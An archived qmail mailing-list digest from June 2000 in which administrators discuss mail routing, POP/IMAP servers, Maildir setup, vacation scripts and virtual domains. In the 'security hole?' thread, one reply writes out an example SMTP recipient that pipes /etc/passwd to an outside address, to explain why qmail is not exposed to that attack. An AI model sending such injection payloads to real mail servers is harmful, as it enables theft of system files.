qmail Digest 3 Jun 2000 10:00:00 -0000 Issue 1021
Topics (messages 42592 through 42618):
Re: Translating qmail messages.
42592 by: Rodrigo Severo
42596 by: James Raftery
Forwarding a Mail to other Mailserver
42593 by: Tushar.Shah.snstech.com
42594 by: Greg Owen
Redhat 6.2 and PAM
42595 by: Michael Heitland
What POP/IMAP servers are best?
42597 by: Enrique Vadillo
42604 by: Uelinton B. dos Santos
42607 by: "Próspero, Esteban"
what should the MAIL variable equal
42598 by: John Stile
42600 by: Johan Almqvist
42601 by: John Stile
q: vacation message.. qmail-vacation..
42599 by: Anton PIrnat
What to do about FAQ 5.4 Security note (password insecure)
42602 by: John Stile
42603 by: Petr Novotny
Announcing qmail-qfilter version 1.3
42605 by: Bruce Guenter
Howto setup multiple postmasters
42606 by: John Anderson
Re: Qmail: problems with SMTP e Qmailadmin
42608 by: "Próspero, Esteban"
virtualdomains question
42609 by: Mike Denka
Queue cleaning: spam problem
42610 by: Jon Rust
security hole?
42611 by: Bob Waskosky
42612 by: Jim Breton
42613 by: Bob Waskosky
42614 by: Jim Breton
42615 by: Bob Waskosky
42616 by: Russell Nelson
42617 by: Bob Waskosky
42618 by: Jim Breton
Administrivia:
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To bug my human owner, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
[EMAIL PROTECTED]
----------------------------------------------------------------------
> This will not work unless you put a space on the (currently) blank
> line in the paragraph above. Without a space, the Portugese text gets
> interpreted by QSBMF readers as an email address and cause for the
> bounce.
>
> Otherwise, I see no reason why it shouldn't work, as long as you don't
> break QSBMF.
First of all, thanks for your answer, but please don't mind me asking,
what is QSBMF? I think I should know more about it before I start
translating qmail messages.
BTW, is there a single place for qmail messages or do I have to look in
all executables? Any clues about where to look for them?
TIAAA,
Rodrigo Severo
On Fri, Jun 02, 2000 at 09:14:02AM -0300, Rodrigo Severo wrote:
> what is QSBMF? I think I should know more about it before I start
> translating qmail messages.
The "qmail-send Bounce Message Format":
http://cr.yp.to/proto/qsbmf.txt
Regards,
james
--
James Raftery (JBR54) - Programmer Hostmaster - IE TLD Hostmaster
IE Domain Registry - www.domainregistry.ie - (+353 1) 706 2375
"Managing 4000 customer domains with BIND has been a lot like
herding cats." - Mike Batchelor, on [EMAIL PROTECTED]
Hello,
I have Domino server running R5 and set all the users and groups on to it.
I would like to set up Qmail on my Red Hat linux 6.1 and would like to set
it up for sending and receiving mail for my domain. At this moment Domino
is doing this job. I want qmail to send and receive mail. The mail which
qmail would receive should get forwarded to my existing domino server. How
do I do this without setting up all the users or groups which I set on
Domino server.
Please help me on this.
Thanks in advance,
Tushar Shah
> I want qmail to send and receive mail. The mail which
> qmail would receive should get forwarded to my existing
> domino server. How do I do this without setting up all
> the users or groups which I set on Domino server.
Let's say that for domain foo.com you want your qmail relay
(qmail.foo.com) to forward all mail to your Domino server (domino.foo.com).
On qmail.foo.com, put 'foo.com' in rcpthosts and
'foo.com:domino.foo.com' in smtproutes. Make sure that 'foo.com' is not in
locals or virtualdomains on qmail.foo.com.
This will mean that qmail.foo.com accepts mail for foo.com
(rcpthosts) and that all mail for foo.com is forwarded to domino.foo.com
(smtproutes).
Once you've set the qmail box up and tested it, modify your DNS so
that your MX records point to qmail.foo.com instead of domino.foo.com.
--
gowen -- Greg Owen -- [EMAIL PROTECTED]
I am not able to get checkpassword and qmail-pop3d to work with pam. I have
run two different diffs on the checkpasswd before compiling and still no
luck. Any one else been able to get this distro to work?
Michael Heitland
Data Systems Engineer
702 communications
(218)-284-5702
(p)1-888-462-4508
Hi all,
I have some 15.000 users in my system and i'm currently testing qmail with
Maildirs (btw i need/want to use Maildirs over NFS), the problem i see is
that since Maildirs change a tiny bit the way my pop and imap servers work
(in other words, my current daemons won't work), so i was wondering whether
you'd have suggestions on what POP and IMAP servers i should use with qmail
with maildirs so i can have the best performance i can get.
Of course i'd like to change *nothing* in my users' PCs (especially regarding
POP clients!) however IMAP i can handle any client changes very easily.
Thanks a lot for any ideas!
Enrique-
Hi Enrique
Take a look of Courier-IMAP at http://www.inter7.com/courierimap
Uelinton
Enrique Vadillo wrote:
> Hi all,
>
> I have some 15.000 users in my system and i'm currently testing qmail with
> Maildirs (btw i need/want to use Maildirs over NFS), the problem i see is
> that since Maildirs change a tiny bit the way my pop and imap servers work
> (in other words, my current daemons won't work), so i was wondering whether
> you'd have suggestions on what POP and IMAP servers i should use with qmail
> with maildirs so i can have the best performance i can get.
Hi!
The pop3 server that works with qmail (Maildir format, more exactly) is
qmail-pop3d that comes with qmail. All you have to do is to set this pop3
server up (just as you made with your smtp server) after you have put down
your old pop server. Read the FAQ for more instructions of how to set it up
with inetd or tcpserver.
Luck!
Esteban Javier Próspero
> -----Original Message-----
> From: Uelinton B. dos Santos [SMTP:[EMAIL PROTECTED]]
> Sent: Friday, June 02, 2000 3:05 PM
> To: Enrique Vadillo
> Cc: [EMAIL PROTECTED]
> Subject: Re: What POP/IMAP servers are best?
>
> Hi Enrique
>
> Take a look of Courier-IMAP at http://www.inter7.com/courierimap
>
>
>
>
> Uelinton
>
> Enrique Vadillo wrote:
>
> > Hi all,
> >
> > I have some 15.000 users in my system and i'm currently testing qmail
> with
> > Maildirs (btw i need/want to use Maildirs over NFS), the problem i see
> is
> > that since Maildirs change a tiny bit the way my pop and imap servers
> work
> > (in other words, my current daemons won't work), so i was wondering
> whether
> > you'd have suggestions on what POP and IMAP servers i should use with
> qmail
> > with maildirs so i can have the best performance i can get.
What should $MAIL equal for local accounts on a linux server?
I'm on linux, redhat6.2, and in /etc/profile I set MAIL=~/Maildir/
When I login, I get the message:
"You have mail.
bash: MAIL=/home/jstile/Maildir/: No such file or directory"
listing my home dir, I see that Maildir does exist:
drwx------ 5 jstile jstile 4096 May 10 17:16 Maildir/
listing the Maildir, I see the correct subdir's:
drwx------ 2 jstile jstile 4096 May 10 17:16 cur/
drwx------ 2 jstile jstile 4096 May 16 00:24 new/
drwx------ 2 jstile jstile 4096 May 16 00:24 tmp/
I used /var/qmail/bin/maildirmake to make the Maildir in each users
home.
But I can't check my mail.
I read the FAQ's, and it didn't help me to fix this problem.
If there is a specific doc for this please let me know.
On Fri, Jun 02, 2000 at 09:12:01AM -0700, John Stile wrote:
> What should $MAIL equal for local accounts on a linux server?
> But I can't check my mail.
What mail client (MUA) are you using? Are you sure it's maildir-aware?
> I read the FAQ's, and it didn't help me to fix this problem.
> If there is a specific doc for this please let me know.
-Johan
--
Johan Almqvist
not sure. I think it's pine
Johan Almqvist wrote:
> On Fri, Jun 02, 2000 at 09:12:01AM -0700, John Stile wrote:
> > What should $MAIL equal for local accounts on a linux server?
> > But I can't check my mail.
>
> What mail client (MUA) are you using? Are you sure it's maildir-aware?
>
> > I read the FAQ's, and it didn't help me to fix this problem.
> > If there is a specific doc for this please let me know.
>
> -Johan
> --
> Johan Almqvist
hi there,
anyone who tried out qmail-vacation script (Peter Samuel) together with vpopmail? As
far i can see it wont use virtual
domains as vpopmail is used to do...
i got the mail.. but no vacation message, nor any failure in my logs
(var/log/messages, var/log/mail).
I tried several changes and also several .qmail-user files..
current one contains a..
--".qmail-u_name"--
| /usr/local/bin/vacation -j username
/var/qmail/vpopmail/domains/domain/
----
and i´d also put a ".vacation.msg " into
/var/qmail/vpopmail/domains/domain/u_name
and .. (just to make sure its not my old brain)
/var/qmail/vpopmail/domains/d_name/u_name/Maildir/
At the vacation makefile i´d set up qmail mailbox file at .. $$home/Maildir (i
guess its one of the probs i have..).
I assume i only have to change less at the vacation perl script, but dunno
where to serach for and what to put in, i guess i am getting older.
Maybe there is a list with all valid qmail ENV variables that helps?
I can.. cook homemade noodles and jelly (not together), repair cars and build
computers, build up networks, support our customers and lots others.. but have
less scripting perl knowledge (yet, but i am hardly working on...)
What i forgot to ask for now? Isn´t it time to leave work now? it seems to be..
regards
Anton Pirnat
--
---
this message is shareware, please register!
---------------------------------------------------------
pmg Medien und Service GmbH phone: +49 711 6574500
Schenkendorfstr. 17 fax: +49 711 6574501
D-70193 Stuttgart www: www.pop-stuttgart.net
Anton Pirnat, Hostmaster email: [EMAIL PROTECTED]
If pop3d is insecure, what is secure?
I don't want to setup something that is broken from the get-go.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On 2 Jun 00, at 10:47, John Stile wrote:
> If pop3d is insecure, what is secure?
> I don't want to setup something that is broken from the get-go.
POP3 protocol is insecure because it requires transmitting
password in plaintext over a network. (If you have pop3 only on a
switched LAN with no option of sniffing, pop3 is perfectly safe.)
APOP is a safer alternative of pop (and I believe qmail supports
APOP as well) but it requires APOP-capable clients.
You may also try to setup POP3 through SSL tunnel or over SSH
port forwarding (both setups are safe).
[I don't know if IMAP is secure or insecure in password
transmission; I never liked the beast.]
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2 -- QDPGP 2.60
Comment: http://community.wow.net/grt/qdpgp.html
iQA/AwUBOTfl/FMwP8g7qbw/EQIsjwCff9lJHRNycu1PxIFp3RzHpI7d5XQAoKuj
ZNrMfOsIwpBFWfx+rc65BI0C
=r111
-----END PGP SIGNATURE-----
--
Petr Novotny, ANTEK CS
[EMAIL PROTECTED]
http://www.antek.cz
PGP key ID: 0x3BA9BC3F
-- Don't you know there ain't no devil there's just God when he's drunk.
[Tom Waits]
Version 1.3 of qmail-qfilter is now available at:
http://em.ca/~bruceg/qmail-qfilter/
See the documentation there for more details,
or join the mailing list by sending an email to:
[EMAIL PROTECTED]
Development versions of qmail-qfilter are available via anonymous CVS.
Set your CVSROOT to ":pserver:[EMAIL PROTECTED]:/CVS",
login with an empty password, and check out the qmail-qfilter module.
-------------------------------------------------------------------------------
Changes in version 1.3
- A new environment variable, "QMAILRCPTS" is set to a newline-seperated
list of the recipients. Note that if a large number of recipients are
encountered (ex more than 64KB worth under Linux), this will cause
execution of the filters to fail and the message will be rejected. I
consider this acceptable, since 64KB worth of recipients is likely
more than 1000 anyways.
- Removed some GNU-specific constructs from the source and Makefile.
- Included a sample MIME filename extension scanning filter.
-------------------------------------------------------------------------------
--
Bruce Guenter <[EMAIL PROTECTED]> http://em.ca/~bruceg/
Hi,
I currently have qmail setup, working, and running 7 seperate virtual
mail servers. (Using /control/virtualhosts and /control/rcpthosts).
Also, possibly a sticking point, each user does not have an account on
the mail server, it is setup that there is 1 popuser.
My question is, how do I setup an account (postmaster) to catch all
mis-addressed email, and send it to the proper contact at said domain.
Example:
Tom is the contact at xyz.com
An email comes into [EMAIL PROTECTED]
Currently the email goes nowhere.
I would like the email to goto [EMAIL PROTECTED]
I would also like mail addressed to [EMAIL PROTECTED] to bounce
to my contact at asdf.com
I know I can set it up so all bounces go to 1 email address, but that
doesn't really isn't my ideal situation.
Any help would be appreciated.
--John
Hi!
I have 200 +/- users into 0,1 y default directories and my users can
authenticate via qmailadmin. You should try the qmailadmin mailing
[EMAIL PROTECTED]
Regards!
Esteban Javier Próspero
> -----Original Message-----
> From: Edilmar Alves [SMTP:[EMAIL PROTECTED]]
> Sent: Tuesday, May 30, 2000 8:57 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Subject: Qmail: problems with SMTP e Qmailadmin
>
> Hi all,
>
> I'd like to solve the following problems:
> 1. SMTP: I configured tcp.smtp like this, to accept
> e-mails only for these IP subnets:
> 192.168.0.:allow,RELAYCLIENT=""
> 192.168.1.:allow,RELAYCLIENT=""
> 200.241.184.:allow,RELAYCLIENT=""
> However, I entered from other ISP, with
> address 200.212.255.25 and SMTP sents
> my email. I boot Linux but the same behaviour
> continues to occurr.
> 2. QMailAdmin: for 10, 20, 50 users, I think
> QMailAdmin is very nice. However, I already
> have more than 600 users, and when I enter
> with postmaster, to administer the email accounts,
> I have to spent more than FIVE minutes, using
> Netscape. I'm using the "graphical interface" from
> lynx, cause performance !!!
> Is there a way to change the HTML skeleton pages
> to show only the buttons, NOT the users list. I think
> the access may be faster than.
> 2. QMailAdmin II: I created some users (+/- 103 users)
> into a domain. All Maildir folders was created into
> .../domains/fes.br/ (fes.br is my domain). After these 103,
> folders like 0/, 1/, ... was created automatically by QMail.
> At this point, no problems!
> However, if one of these new users created into these folders
> try to use QMailAdmin to change password, the system arises
> an exception talking about "There already is a user logged with
> postmaster" (something like this) and the new doesnt get to
> change your password. I have to change password user per
> user, with postmaster account.
> The major users were created with QMailAdmin and some with
> vadduser. Both users arises the exception.
> The strange is: the first users created get to change password
> into Web QMailAdmin...
We are an isp who has used sendmail for many years and we are converting to
qmail. In sendmail we have traditionally used the virtual user table to
allow customers to use a commonly used mailbox like 'webmaster', for
example, at their domain. In the virtusertable on sendmail, if you put only
[EMAIL PROTECTED] in the virtusertable, then any other mailbox
address for that domain, [EMAIL PROTECTED] for example, will
automatically default to fred@ our default domain. With qmail's virtual
user processing, there is no local delivery if 'fred' is not specified in
either the virtual user table itself or in the dot qmail file in the
delivery address specified for the virtual domain.
I'm wondering if there is some way to imitate sendmail's default behavior in
qmail's virtualdomains file or some other qmail control file that I don't
know about yet. It is very important for us to be able to deliver local
mail to [EMAIL PROTECTED] to [EMAIL PROTECTED] by default - i.e.
without having to create a .qmail-anyuser file in the delivery mailbox for
customers.domain for each potential recipient. The reason is that in one
virtual domain case we have literally thousands of such recipients and only
a handful of special delivery cases that will have .qmail files. Is there a
simple way to do this?
Thanks,
Mike
One of my customers upgraded or changed their mail system yesterday
and opened it up for relay by accident. That was bad. Worse is that
they use us as a "smart relay" (which I didn't know until today). SO
now I've got all this mail queued up waiting to go out to hundreds
and thousands of people.
Are there scripts available that I can use to search through the
queue, look for a particular subject/Received line/whatever and ax it?
Thanks,
jon "leaving to smack this customer..."
Hi
I scanned myself online using nessus/nmap (scanning my dynamic IP) and received an
email from nessus stating:
Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false
positive because I,m scanning myself? Any ideas how to fix this?
Thanks in advance
Bob
--
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
-----------------------------------------------------
On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote:
> Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false
>positive because I,m scanning myself? Any ideas how to fix this?
I believe Nessus (correct me if I'm wrong) is trying to send a mail
message to a program like this:
rcpt to: | programname
in which case qmail doesn't handle it specially, it is probably getting
picked up by your .qmail-default in ~alias (or getting bounced, if you
don't have one).
On Sat, Jun 03, 2000 at 04:09:21AM +0000, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote:
> > Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false
>positive because I,m scanning myself? Any ideas how to fix this?
>
>
> I believe Nessus (correct me if I'm wrong) is trying to send a mail
> message to a program like this:
>
> rcpt to: | programname
>
> in which case qmail doesn't handle it specially, it is probably getting
> picked up by your .qmail-default in ~alias (or getting bounced, if you
> don't have one).
>
Is this a hole and how would I plug it?
Thanks
--
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
-----------------------------------------------------
On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote:
> Is this a hole and how would I plug it?
No it's not a hole. It would only be a security concern if your mailer
were to allow the message to actually be piped directly to the program
specified in the "rcpt to" command.
Say for example I were to send this command:
rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd"
or something similar. And your MTA happily piped my message to that
program, which also took /etc/passwd as input and mailed it to me at
[EMAIL PROTECTED] _That_ would be a problem.
With qmail however, pipe symbols are not treated specially and don't
have the same meaning as they would in a shell. They are handled as
though they are part of a username, and since you don't have a local
user "|mail" the message is treated as any normal message to an unknown
user.
You don't need to change anything. :) Nessus assumes that because your
mailer "accepted" the message, it will also deliver it in an "evil"
way... which qmail won't do.
On Sat, Jun 03, 2000 at 04:29:07AM +0000, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote:
> > Is this a hole and how would I plug it?
>
>
> No it's not a hole. It would only be a security concern if your mailer
> were to allow the message to actually be piped directly to the program
> specified in the "rcpt to" command.
>
> Say for example I were to send this command:
>
> rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd"
>
> or something similar. And your MTA happily piped my message to that
> program, which also took /etc/passwd as input and mailed it to me at
> [EMAIL PROTECTED] _That_ would be a problem.
>
> With qmail however, pipe symbols are not treated specially and don't
> have the same meaning as they would in a shell. They are handled as
> though they are part of a username, and since you don't have a local
> user "|mail" the message is treated as any normal message to an unknown
> user.
>
> You don't need to change anything. :) Nessus assumes that because your
> mailer "accepted" the message, it will also deliver it in an "evil"
> way... which qmail won't do.
>
kewl. Thanks for the info.
--
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
-----------------------------------------------------
Bob Waskosky writes:
> > rcpt to: | programname
> Is this a hole and how would I plug it?
It's not a hole. It's someone trying to send mail to the email
address "| programname". The vertical bar is odd, yes. The space is
even more unusual, yes. But a security hole? No. It would be if
qmail were to interpret the | specially, as certain versions of other
MTA's have in the past. But qmail is neither that naive nor trusting.
--
-russ nelson <[EMAIL PROTECTED]> http://russnelson.com
Crynwr sells support for free software | PGPok | "Ask not what your country
521 Pleasant Valley Rd. | +1 315 268 1925 voice | can force other people to
Potsdam, NY 13676-3213 | +1 315 268 9201 FAX | do for you..." -Perry M.
I think the example line in your reply triggered a virus alert.
I received an email stating the reply I sent possibly contained a password stealing
virus. I hope that was just triggered by your example. I don't believe I have any
viruses on this machine.
--
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
-----------------------------------------------------
On Sat, Jun 03, 2000 at 12:00:29AM -0500, Bob Waskosky wrote:
> I think the example line in your reply triggered a virus alert.
> I received an email stating the reply I sent possibly contained a password stealing
>virus. I hope that was just triggered by your example. I don't believe I have any
>viruses on this machine.
Yah I got the same thing in response to my own message (the one that
included the pipe).
I've sent an e-mail to both the intended recipient and to the
support@whatever address supplied in the bounce message.
:P
